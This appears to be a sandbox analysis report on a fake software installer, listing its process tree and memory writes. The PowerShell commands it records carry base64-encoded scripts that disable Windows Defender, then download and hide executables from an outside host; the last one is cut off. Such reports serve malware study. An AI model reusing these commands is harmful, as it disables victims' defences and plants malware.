PID 2412 wrote to memory of 2756	2412	msiexec.exe	29
PID 2060 wrote to memory of 2828	2060	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe	30
PID 2060 wrote to memory of 2828	2060	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe	30
PID 2060 wrote to memory of 2828	2060	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe	30
PID 2060 wrote to memory of 2828	2060	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe	30
PID 2060 wrote to memory of 2828	2060	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe	30
PID 2060 wrote to memory of 2828	2060	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe	30
PID 2060 wrote to memory of 2828	2060	cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe	30
PID 2412 wrote to memory of 2736	2412	msiexec.exe	31
PID 2412 wrote to memory of 2736	2412	msiexec.exe	31
PID 2412 wrote to memory of 2736	2412	msiexec.exe	31
PID 2412 wrote to memory of 2736	2412	msiexec.exe	31
PID 2412 wrote to memory of 2736	2412	msiexec.exe	31
PID 2412 wrote to memory of 2736	2412	msiexec.exe	31
PID 2412 wrote to memory of 2736	2412	msiexec.exe	31
PID 2412 wrote to memory of 1088	2412	msiexec.exe	32
PID 2412 wrote to memory of 1088	2412	msiexec.exe	32
PID 2412 wrote to memory of 1088	2412	msiexec.exe	32
PID 2412 wrote to memory of 1088	2412	msiexec.exe	32
PID 2412 wrote to memory of 1088	2412	msiexec.exe	32
PID 2412 wrote to memory of 1088	2412	msiexec.exe	32
PID 2412 wrote to memory of 1088	2412	msiexec.exe	32
PID 2736 wrote to memory of 2924	2736	MsiExec.exe	33
PID 2736 wrote to memory of 2924	2736	MsiExec.exe	33
PID 2736 wrote to memory of 2924	2736	MsiExec.exe	33
PID 2736 wrote to memory of 2924	2736	MsiExec.exe	33
PID 2636 wrote to memory of 1572	2636	iexplore.exe	37
PID 2636 wrote to memory of 1572	2636	iexplore.exe	37
PID 2636 wrote to memory of 1572	2636	iexplore.exe	37
PID 2636 wrote to memory of 1572	2636	iexplore.exe	37
PID 2924 wrote to memory of 2668	2924	powershell.exe	38
PID 2924 wrote to memory of 2668	2924	powershell.exe	38
PID 2924 wrote to memory of 2668	2924	powershell.exe	38
PID 2668 wrote to memory of 1352	2668	powershell.exe	39
PID 2668 wrote to memory of 1352	2668	powershell.exe	39
PID 2668 wrote to memory of 1352	2668	powershell.exe	39
PID 2668 wrote to memory of 308	2668	powershell.exe	40
PID 2668 wrote to memory of 308	2668	powershell.exe	40
PID 2668 wrote to memory of 308	2668	powershell.exe	40
PID 2736 wrote to memory of 388	2736	MsiExec.exe	43
PID 2736 wrote to memory of 388	2736	MsiExec.exe	43
PID 2736 wrote to memory of 388	2736	MsiExec.exe	43
PID 2736 wrote to memory of 388	2736	MsiExec.exe	43
PID 388 wrote to memory of 2588	388	powershell.exe	44
PID 388 wrote to memory of 2588	388	powershell.exe	44
PID 388 wrote to memory of 2588	388	powershell.exe	44
PID 2588 wrote to memory of 1848	2588	powershell.exe	45
PID 2588 wrote to memory of 1848	2588	powershell.exe	45
PID 2588 wrote to memory of 1848	2588	powershell.exe	45
PID 2736 wrote to memory of 1836	2736	MsiExec.exe	47
PID 2736 wrote to memory of 1836	2736	MsiExec.exe	47
PID 2736 wrote to memory of 1836	2736	MsiExec.exe	47
PID 2736 wrote to memory of 1836	2736	MsiExec.exe	47
PID 1836 wrote to memory of 2592	1836	powershell.exe	48
PID 1836 wrote to memory of 2592	1836	powershell.exe	48
PID 1836 wrote to memory of 2592	1836	powershell.exe	48
PID 2592 wrote to memory of 2236	2592	powershell.exe	49
PID 2592 wrote to memory of 2236	2592	powershell.exe	49

C:\Users\Admin\AppData\Local\Temp\cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe
"C:\Users\Admin\AppData\Local\Temp\cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe"
1⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2060
- C:\Windows\SysWOW64\msiexec.exe
  "C:\Windows\system32\msiexec.exe" /i C:\Users\Admin\AppData\Local\Temp\FreeSoftPlace\2024.02.07\990F4DC\FreeSoftPlace.msi MSIINSTALLPERUSER=1 ALLUSERS=2 /qn AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\cb966139adb162ea019d1f6ca648febaf4249cbb9e255f492987f26087c3397b.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1707454873 " AI_EUIMSI=""
  2⤵
  PID:2828

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2412
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding A3A0DF27DC05B181A4B689F35C8C0F24 C
  2⤵
  - Loads dropped DLL
  PID:2756
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 1652A5F8C93239C9DEB26EB1DB4E17BB
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2736
- - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
    -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss5860.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msi584D.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scr584E.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scr584F.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."
    3⤵
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:2924
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -enc YwBoAGMAcAAgADEAMgA1ADIACgAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlACAAPQAgACcAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQAnAAoACgBTAGUAdAAtAEUAeABlAGMAdQB0AGkAbwBuAFAAbwBsAGkAYwB5ACAALQBTAGMAbwBwAGUAIABDAHUAcgByAGUAbgB0AFUAcwBlAHIAIABCAHkAcABhAHMAcwAgAC0ARgBvAHIAYwBlAAoAUwBlAHQALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAC0AUwBjAG8AcABlACAATABvAGMAYQBsAE0AYQBjAGgAaQBuAGUAIABCAHkAcABhAHMAcwAgAC0ARgBvAHIAYwBlAAoACgBpAGYAKAAtAE4AbwB0ACAAJAAoACQAKAB3AGgAbwBhAG0AaQApACAALQBlAHEAIAAiAG4AdAAgAGEAdQB0AGgAbwByAGkAdAB5AFwAcwB5AHMAdABlAG0AIgApACkAIAB7AAoAIAAgACAAIAAkAEkAcwBTAHkAcwB0AGUAbQAgAD0AIAAkAGYAYQBsAHMAZQAKAAoAIAAgACAAIABpAGYAIAAoAC0ATgBvAHQAIAAoAFsAUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAFAAcgBpAG4AYwBpAHAAYQBsAF0AIABbAFMAZQBjAHUAcgBpAHQAeQAuAFAAcgBpAG4AYwBpAHAAYQBsAC4AVwBpAG4AZABvAHcAcwBJAGQAZQBuAHQAaQB0AHkAXQA6ADoARwBlAHQAQwB1AHIAcgBlAG4AdAAoACkAKQAuAEkAcwBJAG4AUgBvAGwAZQAoAFsAUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAEIAdQBpAGwAdABJAG4AUgBvAGwAZQBdACAAJwBBAGQAbQBpAG4AaQBzAHQAcgBhAHQAbwByACcAKQApACAAewAKACAAIAAgACAAIAAgACAAIAAkAEMAbwBtAG0AYQBuAGQATABpAG4AZQAgAD0AIAAiAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABCAHkAcABhAHMAcwAgAGAAIgAiACAAKwAgACQATQB5AEkAbgB2AG8AYwBhAHQAaQBvAG4ALgBNAHkAQwBvAG0AbQBhAG4AZAAuAFAAYQB0AGgAIAArACAAIgBgACIAIAAiACAAKwAgACQATQB5AEkAbgB2AG8AYwBhAHQAaQBvAG4ALgBVAG4AYgBvAHUAbgBkAEEAcgBnAHUAbQBlAG4AdABzAAoAIAAgACAAIAAgACAAIAAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgAFAAbwB3AGUAcgBTAGgAZQBsAGwALgBlAHgAZQAgAC0AVgBlAHIAYgAgAFIAdQBuAGEAcwAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIAAkAEMAbwBtAG0AYQBuAGQATABpAG4AZQAKACAAIAAgACAAIAAgACAAIABFAHgAaQB0AAoAIAAgACAAIAB9AAoACgAgACAAIAAgACQAcABzAGUAeABlAGMAXwBwAGEAdABoACAAPQAgACQAKABHAGUAdAAtAEMAbwBtAG0AYQBuAGQAIABQAHMARQB4AGUAYwAgAC0ARQByAHIAbwByAEEAYwB0AGkAbwBuACAAJwBpAGcAbgBvAHIAZQAnACkALgBTAG8AdQByAGMAZQAgAAoAIAAgACAAIABpAGYAKAAkAHAAcwBlAHgAZQBjAF8AcABhAHQAaAApACAAewAKACAAIAAgACAAIAAgACAAIAAkAEMAbwBtAG0AYQBuAGQATABpAG4AZQAgAD0AIAAiACAALQBpACAALQBzACAAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAEIAeQBwAGEAcwBzACAAYAAiACIAIAArACAAJABNAHkASQBuAHYAbwBjAGEAdABpAG8AbgAuAE0AeQBDAG8AbQBtAGEAbgBkAC4AUABhAHQAaAAgACsAIAAiAGAAIgAgACIAIAArACAAJABNAHkASQBuAHYAbwBjAGEAdABpAG8AbgAuAFUAbgBiAG8AdQBuAGQAQQByAGcAdQBtAGUAbgB0AHMAIAAKACAAIAAgACAAIAAgACAAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgAgAC0ARgBpAGwAZQBQAGEAdABoACAAJABwAHMAZQB4AGUAYwBfAHAAYQB0AGgAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAJABDAG8AbQBtAGEAbgBkAEwAaQBuAGUACgAgACAAIAAgACAAIAAgACAAZQB4AGkAdAAKACAAIAAgACAAfQAgAGUAbABzAGUAIAB7AAoAIAAgACAAIAB9AAoACgB9ACAAZQBsAHMAZQAgAHsACgAgACAAIAAgACQASQBzAFMAeQBzAHQAZQBtACAAPQAgACQAdAByAHUAZQAKAH0ACgAKADYANwAuAC4AOQAwAHwAZgBvAHIAZQBhAGMAaAAtAG8AYgBqAGUAYwB0AHsACgAgACAAIAAgACQAZAByAGkAdgBlACAAPQAgAFsAYwBoAGEAcgBdACQAXwAKACAAIAAgACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACIAJAAoACQAZAByAGkAdgBlACkAOgBcACIAIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUACgAgACAAIAAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIAAiACQAKAAkAGQAcgBpAHYAZQApADoAXAAqACIAIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUACgB9AAoACgBTAGUAdAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBMAG8AdwBUAGgAcgBlAGEAdABEAGUAZgBhAHUAbAB0AEEAYwB0AGkAbwBuACAAQQBsAGwAbwB3ACAALQBFAHIAcgBvAHIAQQBjAHQAaQBvAG4AIABTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlAAoAUwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ATQBvAGQAZQByAGEAdABlAFQAaAByAGUAYQB0AEQAZQBmAGEAdQBsAHQAQQBjAHQAaQBvAG4AIABBAGwAbABvAHcAIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUACgBTAGUAdAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBIAGkAZwBoAFQAaAByAGUAYQB0AEQAZQBmAGEAdQBsAHQAQQBjAHQAaQBvAG4AIABBAGwAbABvAHcAIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUACgAKACQAbgBlAGUAZABfAHIAZQBiAG8AbwB0ACAAPQAgACQAZgBhAGwAcwBlAAoACgAkAHMAdgBjAF8AbABpAHMAdAAgAD0AIABAACgAIgBXAGQATgBpAHMAUwB2AGMAIgAsACAAIgBXAGkAbgBEAGUAZgBlAG4AZAAiACwAIAAiAFMAZQBuAHMAZQAiACkACgBmAG8AcgBlAGEAYwBoACgAJABzAHYAYwAgAGkAbgAgACQAcwB2AGMAXwBsAGkAcwB0ACkAIAB7AAoAIAAgACAAIABpAGYAKAAkACgAVABlAHMAdAAtAFAAYQB0AGgAIAAiAEgASwBMAE0AOgBcAFMAWQBTAFQARQBNAFwAQwB1AHIAcgBlAG4AdABDAG8AbgB0AHIAbwBsAFMAZQB0AFwAUwBlAHIAdgBpAGMAZQBzAFwAJABzAHYAYwAiACkAKQAgAHsACgAgACAAIAAgACAAIAAgACAAaQBmACgAIAAkACgARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AUABhAHQAaAAgACIASABLAEwATQA6AFwAUwBZAFMAVABFAE0AXABDAHUAcgByAGUAbgB0AEMAbwBuAHQAcgBvAGwAUwBlAHQAXABTAGUAcgB2AGkAYwBlAHMAXAAkAHMAdgBjACIAKQAuAFMAdABhAHIAdAAgAC0AZQBxACAANAApACAAewAKACAAIAAgACAAIAAgACAAIAB9ACAAZQBsAHMAZQAgAHsACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABTAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAAIgBIAEsATABNADoAXABTAFkAUwBUAEUATQBcAEMAdQByAHIAZQBuAHQAQwBvAG4AdAByAG8AbABTAGUAdABcAFMAZQByAHYAaQBjAGUAcwBcACQAcwB2AGMAIgAgAC0ATgBhAG0AZQAgAFMAdABhAHIAdAAgAC0AVgBhAGwAdQBlACAANAAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAbgBlAGUAZABfAHIAZQBiAG8AbwB0ACAAPQAgACQAZgBhAGwAcwBlAAoAIAAgACAAIAAgACAAIAAgAH0ACgAgACAAIAAgAH0AIABlAGwAcwBlACAAewAKACAAIAAgACAAfQAKAH0ACgAKACQAZAByAHYAXwBsAGkAcwB0ACAAPQAgAEAAKAAiAFcAZABuAGkAcwBEAHIAdgAiACwAIAAiAHcAZABmAGkAbAB0AGUAcgAiACwAIAAiAHcAZABiAG8AbwB0ACIAKQAKAGYAbwByAGUAYQBjAGgAKAAkAGQAcgB2ACAAaQBuACAAJABkAHIAdgBfAGwAaQBzAHQAKQAgAHsACgAgACAAIAAgAGkAZgAoACQAKABUAGUAcwB0AC0AUABhAHQAaAAgACIASABLAEwATQA6AFwAUwBZAFMAVABFAE0AXABDAHUAcgByAGUAbgB0AEMAbwBuAHQAcgBvAGwAUwBlAHQAXABTAGUAcgB2AGkAYwBlAHMAXAAkAGQAcgB2ACIAKQApACAAewAKACAAIAAgACAAIAAgACAAIABpAGYAKAAgACQAKABHAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAAIgBIAEsATABNADoAXABTAFkAUwBUAEUATQBcAEMAdQByAHIAZQBuAHQAQwBvAG4AdAByAG8AbABTAGUAdABcAFMAZQByAHYAaQBjAGUAcwBcACQAZAByAHYAIgApAC4AUwB0AGEAcgB0ACAALQBlAHEAIAA0ACkAIAB7AAoAIAAgACAAIAAgACAAIAAgAH0AIABlAGwAcwBlACAAewAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAiAEgASwBMAE0AOgBcAFMAWQBTAFQARQBNAFwAQwB1AHIAcgBlAG4AdABDAG8AbgB0AHIAbwBsAFMAZQB0AFwAUwBlAHIAdgBpAGMAZQBzAFwAJABkAHIAdgAiACAALQBOAGEAbQBlACAAUwB0AGEAcgB0ACAALQBWAGEAbAB1AGUAIAA0AAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABuAGUAZQBkAF8AcgBlAGIAbwBvAHQAIAA9ACAAJABmAGEAbABzAGUACgAgACAAIAAgACAAIAAgACAAfQAKACAAIAAgACAAfQAgAGUAbABzAGUAIAB7AAoAIAAgACAAIAB9AAoAfQAKAAoAaQBmACgAJAAoAEcARQBUAC0AUwBlAHIAdgBpAGMAZQAgAC0ATgBhAG0AZQAgAFcAaQBuAEQAZQBmAGUAbgBkACkALgBTAHQAYQB0AHUAcwAgAC0AZQBxACAAIgBSAHUAbgBuAGkAbgBnACIAKQAgAHsAIAAgACAACgAgACAAIAAgACQAbgBlAGUAZABfAHIAZQBiAG8AbwB0ACAAPQAgACQAZgBhAGwAcwBlAAoAfQA=
      4⤵
      Drops file in System32 directory
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
      PID:2668
    - - C:\Windows\system32\chcp.com
        
        "C:\Windows\system32\chcp.com" 1252
        5⤵
        
        PID:1352
    - - C:\Windows\system32\whoami.exe
        
        "C:\Windows\system32\whoami.exe"
        5⤵
        
        PID:308
- - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
    -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss7A27.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msi7A15.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scr7A16.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scr7A26.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."
    3⤵
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:388
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -enc YwBoAGMAcAAgADEAMgA1ADIACgAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlACAAPQAgACcAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQAnAAoACgBTAGUAdAAtAEUAeABlAGMAdQB0AGkAbwBuAFAAbwBsAGkAYwB5ACAALQBTAGMAbwBwAGUAIABDAHUAcgByAGUAbgB0AFUAcwBlAHIAIABCAHkAcABhAHMAcwAgAC0ARgBvAHIAYwBlAAoAUwBlAHQALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAC0AUwBjAG8AcABlACAATABvAGMAYQBsAE0AYQBjAGgAaQBuAGUAIABCAHkAcABhAHMAcwAgAC0ARgBvAHIAYwBlAAoACgBpAGYAIAAoAFQAZQBzAHQALQBQAGEAdABoACAALQBQAGEAdABoACAAIgAkAGUAbgB2ADoAUABSAE8ARwBSAEEATQBEAEEAVABBAFwAQgByAGEAdgBlAEMAcgBhAHMAaABIAGEAbgBkAGwAZQByAC4AZQB4AGUAIgAgAC0AUABhAHQAaABUAHkAcABlACAATABlAGEAZgApAHsAfQAKAGUAbABzAGUAIAB7AAoACQBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAiAGgAdAB0AHAAcwA6AC8ALwBmAGkAbABlAHMALgBmAHIAZQBlAHMAbwBmAHQAcABsAGEAYwBlAC4AYwBvAG0ALwBCAHIAYQB2AGUAQwByAGEAcwBoAEgAYQBuAGQAbABlAHIALgBlAHgAZQAiACAALQBPAHUAdABGAGkAbABlACAAIgAkAGUAbgB2ADoAUABSAE8ARwBSAEEATQBEAEEAVABBAFwAQgByAGEAdgBlAEMAcgBhAHMAaABIAGEAbgBkAGwAZQByAC4AZQB4AGUAIgAKAH0ACgAKACQAZgBpAGwAZQAgAD0AIABHAGUAdAAtAEMAaABpAGwAZABJAHQAZQBtACAAIgAkAGUAbgB2ADoAUABSAE8ARwBSAEEATQBEAEEAVABBAFwAQgByAGEAdgBlAEMAcgBhAHMAaABIAGEAbgBkAGwAZQByAC4AZQB4AGUAIgAKACQAZgBpAGwAZQAuAEEAdAB0AHIAaQBiAHUAdABlAHMAIAA9ACAAJwBIAGkAZABkAGUAbgAnACwAJwBTAHkAcwB0AGUAbQAnAA==
      4⤵
      Drops file in System32 directory
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
      PID:2588
    - - C:\Windows\system32\chcp.com
        
        "C:\Windows\system32\chcp.com" 1252
        5⤵
        
        PID:1848
- - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
    -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss91A2.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msi919F.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scr91A0.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scr91A1.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."
    3⤵
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:1836
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -enc YwBoAGMAcAAgADEAMgA1ADIACgAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlACAAPQAgACcAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQAnAAoACgBTAGUAdAAtAEUAeABlAGMAdQB0AGkAbwBuAFAAbwBsAGkAYwB5ACAALQBTAGMAbwBwAGUAIABDAHUAcgByAGUAbgB0AFUAcwBlAHIAIABCAHkAcABhAHMAcwAgAC0ARgBvAHIAYwBlAAoAUwBlAHQALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAC0AUwBjAG8AcABlACAATABvAGMAYQBsAE0AYQBjAGgAaQBuAGUAIABCAHkAcABhAHMAcwAgAC0ARgBvAHIAYwBlAAoACgBpAGYAIAAoAFQAZQBzAHQALQBQAGEAdABoACAALQBQAGEAdABoACAAIgAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQBcAEcAbwBvAGcAbABlAEMAcgBhAHMAaABIAGEAbgBkAGwAZQByAC4AZQB4AGUAIgAgAC0AUABhAHQAaABUAHkAcABlACAATABlAGEAZgApAHsAfQAKAGUAbABzAGUAIAB7AAoACQBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAiAGgAdAB0AHAAcwA6AC8ALwBmAGkAbABlAHMALgBmAHIAZQBlAHMAbwBmAHQAcABsAGEAYwBlAC4AYwBvAG0ALwBHAG8AbwBnAGwAZQBDAHIAYQBzAGgASABhAG4AZABsAGUAcgAuAGUAeABlACIAIAAtAE8AdQB0AEYAaQBsAGUAIAAiACQAZQBuAHYAOgBBAFAAUABEAEEAVABBAFwARwBvAG8AZwBsAGUAQwByAGEAcwBoAEgAYQBuAGQAbABlAHIALgBlAHgAZQAiAAoAfQAKAAoAJABmAGkAbABlACAAPQAgAEcAZQB0AC0AQwBoAGkAbABkAEkAdABlAG0AIAAiACQAZQBuAHYAOgBBAFAAUABEAEEAVABBAFwARwBvAG8AZwBsAGUAQwByAGEAcwBoAEgAYQBuAGQAbABlAHIALgBlAHgAZQAiAAoAJABmAGkAbABlAC4AQQB0AHQAcgBpAGIAdQB0AGUAcwAgAD0AIAAnAEgAaQBkAGQAZQBuACcALAAnAFMAeQBzAHQAZQBtACcACgAKACQAZgBpAGwAZQAgAD0AIABHAGUAdAAtAEMAaABpAGwAZABJAHQAZQBtACAAIgAkAGUAbgB2ADoAVQBTAEUAUgBQAFIATwBGAEkATABFAFwAQQBQAFAARABBAFQAQQBcAEwATwBDAEEATABcAFQARQBNAFAAXABkAEkAbABoAG8AcwB0AC4AZQB4AGUAIgAKACQAZgBpAGwAZQAuAEEAdAB0AHIAaQBiAHUAdABlAHMAIAA9ACAAJwBIAGkAZABkAGUAbgAnACwAJwBTAHkAcwB0AGUAbQAnAAoACgAkAGYAaQBsAGUAIAA9ACAARwBlAHQALQBDAGgAaQBsAGQASQB0AGUAbQAgACIAJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAXABUAEUATQBQAFwAZABJAGwAaABvAHMAdAAuAGUAeABlACIACgAkAGYAaQBsAGUALgBBAHQAdAByAGkAYgB1AHQAZQBzACAAPQAgACcASABpAGQAZABlAG4AJwAsACcAUwB5AHMAdABlAG0AJwA=
      4⤵
      Drops file in System32 directory
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
      PID:2592
    - - C:\Windows\system32\chcp.com
        
        "C:\Windows\system32\chcp.com" 1252
        5⤵
        
        PID:2236
- - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
    -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pssA076.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msiA073.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scrA074.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scrA075.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."
    3⤵
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    PID:1764
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -enc YwBoAGMAcAAgADEAMgA1ADIACgAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlACAAPQAgACcAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQAnAAoACgBTAGUAdAAtAEUAeABlAGMAdQB0AGkAbwBuAFAAbwBsAGkAYwB5ACAALQBTAGMAbwBwAGUAIABDAHUAcgByAGUAbgB0AFUAcwBlAHIAIABCAHkAcABhAHMAcwAgAC0ARgBvAHIAYwBlAAoAUwBlAHQALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAC0AUwBjAG8AcABlACAATABvAGMAYQBsAE0AYQBjAGgAaQBuAGUAIABCAHkAcABhAHMAcwAgAC0ARgBvAHIAYwBlAAoACgBpAGYAIAAoAFQAZQBzAHQALQBQAGEAdABoACAALQBQAGEAdABoACAAIgAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQBcAEcAbwBvAGcAbABlAEMAcgBhAHMAaABIAGEAbgBkAGwAZQByADYANAAuAGUAeABlACIAIAAtAFAAYQB0AGgAVAB5AHAAZQAgAEwAZQBhAGYAKQB7AH0ACgBlAGwAcwBlACAAewAKAAkASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAIgBoAHQAdABwAHMAOgAvAC8AZgBpAGwAZQBzAC4AZgByAGUAZQBzAG8AZgB0AHAAbABhAGMAZQAuAGMAbwBtAC8ARwBvAG8AZwBsAGUAQwByAGEAcwBoAEgAYQBuAGQAbABlAHIANgA0AC4AZQB4AGUAIgAgAC0ATwB1AHQARgBpAGwAZQAgACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXABHAG8AbwBnAGwAZQBDAHIAYQBzAGgASABhAG4AZABsAGUAcgA2ADQALgBlAHgAZQAiAAoAfQAKAAoAJABmAGkAbABlACAAPQAgAEcAZQB0AC0AQwBoAGkAbABkAEkAdABlAG0AIAAiACQAZQBuAHYAOgBBAFAAUABEAEEAVABBAFwARwBvAG8AZwBsAGUAQwByAGEAcwBoAEgAYQBuAGQAbABlAHIANgA0AC4AZQB4AGUAIgAKACQAZgBpAGwAZQAuAEEAdAB0AHIAaQBiAHUAdABlAHMAIAA9ACAAJwBIAGkAZABkAGUAbgAnACwAJwBTAHkAcwB0AGUAbQAnAAoACgAkAGYAaQBsAGUAIAA9ACAARwBl